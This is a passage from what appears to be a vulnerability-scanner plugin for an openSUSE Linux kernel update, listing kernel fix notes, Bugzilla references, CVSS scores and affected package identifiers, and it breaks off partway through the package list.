- drivers:hv: Export a function that maps Linux CPU num\n onto Hyper-V proc num (bnc#965924).\n\n - drivers:hv: Export the API to invoke a hypercall on\n Hyper-V (bnc#965924).\n\n - drivers: hv: kvp: fix IP Failover.\n\n - drivers:pci:hv: New paravirtual PCI front-end for\n Hyper-V VMs (bnc#965924).\n\n - drivers: xen-blkfront: only talk_to_blkback() when in\n XenbusStateInitialising (bsc#957986 fate#320625).\n\n - driver: xen-blkfront: move talk_to_blkback to a more\n suitable place (bsc#957986 fate#320625).\n\n - drm/i915: do not warn if backlight unexpectedly enabled\n (boo#972068).\n\n - drm/i915: set backlight duty cycle after backlight\n enable for gen4 (boo#972780).\n\n - e1000e: Avoid divide by zero error (bsc#968643).\n\n - e1000e: fix division by zero on jumbo MTUs (bsc#968643).\n\n - e1000e: Fix tight loop implementation of systime read\n algorithm (bsc#968643).\n\n - fix: print ext4 mountopt data_err=abort correctly\n (bsc#969735).\n\n - fs/proc_namespace.c: simplify testing nsp and\n nsp->mnt_ns (bug#963960).\n\n - futex: Drop refcount if requeue_pi() acquired the\n rtmutex (bug#960174).\n\n - hv: Lock access to hyperv_mmio resource tree\n (bnc#965924).\n\n - hv: Make a function to free mmio regions through vmbus\n (bnc#965924).\n\n - hv: Reverse order of resources in hyperv_mmio\n (bnc#965924).\n\n - hv: Track allocations of children of hv_vmbus in private\n resource tree (bnc#965924).\n\n - hv: Use new vmbus_mmio_free() from client drivers\n (bnc#965924).\n\n - hwmon: (coretemp) Increase maximum core to 128\n (bsc#970160)\n\n - ibmvnic: Fix ibmvnic_capability struct (fate#320253).\n\n - intel_pstate: Use del_timer_sync in\n intel_pstate_cpu_stop (bsc#967650).\n\n - ipv6: mld: fix add_grhead skb_over_panic for devs with\n large MTUs (bsc#956852).\n\n - kabi: Preserve checksum of kvm_x86_ops (bsc#969112).\n\n - kABI: protect enum enclosure_component_type.\n\n - kabi: protect struct acpi_processor signature\n (bsc#959463).\n\n - kABI: protect struct af_alg_type.\n\n - kABI: protect struct crypto_ahash.\n\n - kABI: protect struct dm_exception_store_type.\n\n - kABI: protect struct fib_nh_exception.\n\n - kABI: protect struct module.\n\n - kABI: protect struct rq.\n\n - kABI: protect struct sched_class.\n\n - kABI: protect struct scm_creds.\n\n - kABI: protect struct user_struct.\n\n - kabi/severities :\n\n - kabi/severities: Fail on changes in kvm_x86_ops, needed\n by lttng-modules\n\n - kgr: fix reversion of a patch already reverted by a\n replace_all patch (fate#313296).\n\n - kvm: SVM: add rdmsr support for AMD event registers\n (bsc#968448).\n\n - kvm: x86: Check dest_map->vector to match eoi signals\n for rtc (bsc#966471).\n\n - kvm: x86: Convert ioapic->rtc_status.dest_map to a\n struct (bsc#966471).\n\n - kvm: x86: store IOAPIC-handled vectors in each VCPU\n (bsc#966471).\n\n - kvm: x86: Track irq vectors in\n ioapic->rtc_status.dest_map (bsc#966471).\n\n - libceph: fix scatterlist last_piece calculation\n (bsc#963746).\n\n - lpfc: Fix kmalloc overflow in LPFC driver at large core\n count (bsc#969690).\n\n - memcg: do not hang on OOM when killed by userspace OOM\n access to memory reserves (bnc#969571).\n\n - mld, igmp: Fix reserved tailroom calculation\n (bsc#956852).\n\n - mmc: Exynos: Add module alias for dw mmc.\n\n - mvneta: fix per-cpu stats initialization.\n\n - namespaces: Re-introduce task_nsproxy() helper\n (bug#963960).\n\n - namespaces: Use task_lock and not rcu to protect nsproxy\n (bug#963960).\n\n - net: core: Correct an over-stringent device loop\n detection (bsc#945219).\n\n - net: irda: Fix use-after-free in irtty_open()\n (bnc#967903).\n\n - nfs4: treat lock owners as opaque values (bnc#968141).\n\n - nfs: Background flush should not be low priority\n (bsc#955308).\n\n - nfsd: fix nfsd_setattr return code for HSM (bsc#969992).\n\n - nfs: do not use STABLE writes during writeback\n (bnc#816099).\n\n - nfs: Fix handling of re-write-before-commit for mmapped\n NFS pages (bsc#964201).\n\n - nvme: default to 4k device page size (bsc#967047).\n\n - nvme: special case AEN requests (bsc#965087).\n\n - omap3isp: fix miscompile.\n\n - omap: Fix missing cm3xxx.h include.\n\n - omap: Fix missing usb.h include.\n\n - pci: Add global pci_lock_rescan_remove() (bnc#965924).\n\n - pci: allow access to VPD attributes with size 0\n (bsc#959146).\n\n - pciback: Check PF instead of VF for PCI_COMMAND_MEMORY.\n\n - pciback: Save the number of MSI-X entries to be copied\n later.\n\n - pci: Blacklist vpd access for buggy devices\n (bsc#959146).\n\n - pci: Determine actual VPD size on first access\n (bsc#959146).\n\n - pci: Export symbols required for loadable host driver\n modules (bnc#965924).\n\n - pci: pciehp: Disable link notification across slot reset\n (bsc#967651).\n\n - pci: pciehp: Do not check adapter or latch status while\n disabling (bsc#967651).\n\n - pci: pciehp: Do not disable the link permanently during\n removal (bsc#967651).\n\n - pci: pciehp: Ensure very fast hotplug events are also\n processed (bsc#967651).\n\n - pci: Update VPD definitions (bsc#959146).\n\n - perf, nmi: Fix unknown NMI warning (bsc#968512).\n\n - power: Add _GLOBAL_TOC for 32bit.\n\n - proc: Fix ptrace-based permission checks for accessing\n task maps.\n\n - qla2xxx: Remove unavailable firmware files (bsc#943645).\n\n - rbd: do not log miscompare as an error (bsc#970062).\n\n - Refresh\n patches.drivers/0005-aacraid-MSI-x-support.patch.\n (boo#970249)\n\n - resources: Set type in __request_region() (bnc#965924).\n\n - Revert 'ipv6: tcp: add rcu locking in\n tcp_v6_send_synack()' (bnc#961257).\n\n - rpm/kernel-binary.spec.in: Sync the main and -base\n package dependencies (bsc#965830#c51).\n\n - rpm/kernel-module-subpackage: Fix obsoleting dropped\n flavors (bsc#968253)\n\n - sched: unbreak non-SMP build.\n\n - scsi_dh_alua: Do not block request queue if workqueue is\n active (bsc#960458).\n\n - scsi: fix soft lockup in scsi_remove_target() on module\n removal (bsc#965199).\n\n - scsi: proper state checking and module refcount handling\n in scsi_device_get (boo#966831).\n\n - series.conf: add section comments\n\n - supported.conf: Add e1000e (emulated by VMware) to -base\n (bsc#968074)\n\n - supported.conf: Add Hyper-V modules to -base\n (bsc#965830)\n\n - supported.conf: Add isofs to -base (bsc#969655).\n\n - supported.conf: Add more qemu device driver (bsc#968234)\n\n - supported.conf: Add mptspi and mptsas to -base\n (bsc#968206)\n\n - supported.conf: Add the qemu scsi driver (sym53c8xx) to\n -base (bsc#967802)\n\n - supported.conf: Add tulip to -base for Hyper-V\n (bsc#968234)\n\n - supported.conf: Add virtio-rng (bsc#966026)\n\n - supported.conf: Add xen-blkfront.\n\n - supported.conf: Add xfs to -base (bsc#965891)\n\n - supported.conf: Fix usb-common path usb-common moved to\n its own subdirectory in kernel v3.16, and we backported\n that change to SLE12.\n\n - sysctl: do not add hardlockup_all_cpu_backtrace sysctl\n on UP.\n\n - tcp: Restore RFC5961-compliant behavior for SYN packets\n (bsc#966864).\n\n - Update config files. Add new option\n CONFIG_PARAVIRT_XEN_BLKDEV_FRONTEND to i386 xen and ec2.\n\n - Update config files. Enable CONFIG_DEBUG_INFO for ec2\n flavor. It's overriden on build anyway and having it\n disabled causes 'make silentoldconfig' checks fail\n because of new symbol CONFIG_DEBUG_INFO_REDUCED.\n\n - Update config files: enable CONFIG_PCI_HYPERV in non-SLE\n configs These are i386/* except xen, ec2 and vanilla and\n x86_64 desktop and trace.\n\n - Update config files: enable MACH_CUBOX in armv7hl/cubox\n\n - Update config files: ppc and ppc64 are big endian New\n config options (not existing in 13.1) need to be set\n accordingly.\n\n - Update\n patches.drivers/drm-ast-Initialize-data-needed-to-map-fb\n dev-memory.patch (bnc#880007). Fix refs and upstream\n status.\n\n - Update Xen config files (enable upstream block\n frontend).\n\n - Update Xen patches to 3.12.55.\n\n - USB: ehci-s5p: Fix phy reset.\n\n - usb: phy: Fix phy-samsung-usb when built as module.\n\n - usb: Quiet down false peer failure messages\n (bnc#960629).\n\n - x86: export x86_msi (bnc#965924).\n\n - xen: Add /etc/modprobe.d/50-xen.conf selecting Xen\n frontend driver implementation (bsc#957986, bsc#956084,\n bsc#961658).\n\n - xen-blkfront: allow building in our Xen environment\n (bsc#957986 fate#320625).\n\n - xen, blkfront: factor out flush-related checks from\n do_blkif_request() (bsc#957986 fate#320625).\n\n - xen-blkfront: fix accounting of reqs when migrating\n (bsc#957986 fate#320625).\n\n - xen/blkfront: Fix crash if backend does not follow the\n right states (bsc#957986 fate#320625).\n\n - xen-blkfront: improve aproximation of required grants\n per request (bsc#957986 fate#320625).\n\n - xen/blkfront: improve protection against issuing\n unsupported REQ_FUA (bsc#957986 fate#320625).\n\n - xen/blkfront: remove redundant flush_op (bsc#957986\n fate#320625).\n\n - xen-blkfront: remove type check from\n blkfront_setup_discard (bsc#957986 fate#320625).\n\n - xen-blkfront: Silence pfn maybe-uninitialized warning\n (bsc#957986 fate#320625).\n\n - xen: fix blkfront and blkback build with normal xen.\n\n - xen-vscsi-large-requests: Fix resource collision for\n racing request maps and unmaps (bsc#966094).\n\n - xfs/dmapi: drop lock over synchronous XFS_SEND_DATA\n events (bsc#969993).\n\n - xfs/dmapi: propertly send postcreate event (bsc#967299).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=816099\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=867251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=880007\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=943645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=945219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=949752\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=955308\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=956084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=956852\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=957986\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=957990\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=959146\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=959463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=959709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=960174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=960458\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=960561\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=960563\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=960629\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=961257\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=961500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=961658\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963193\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963746\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963765\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963827\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963960\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=964201\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=965087\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=965199\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=965830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=965891\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=965924\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966026\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966094\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966437\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966864\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=967047\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=967292\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=967299\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=967650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=967651\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=967802\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=967903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968018\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968141\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968206\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968230\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968234\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968448\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968643\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969439\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969690\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969992\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969993\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970062\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970249\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970909\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=972068\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=972780\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected the Linux Kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-eppic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-eppic-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-gcore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-gcore-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", 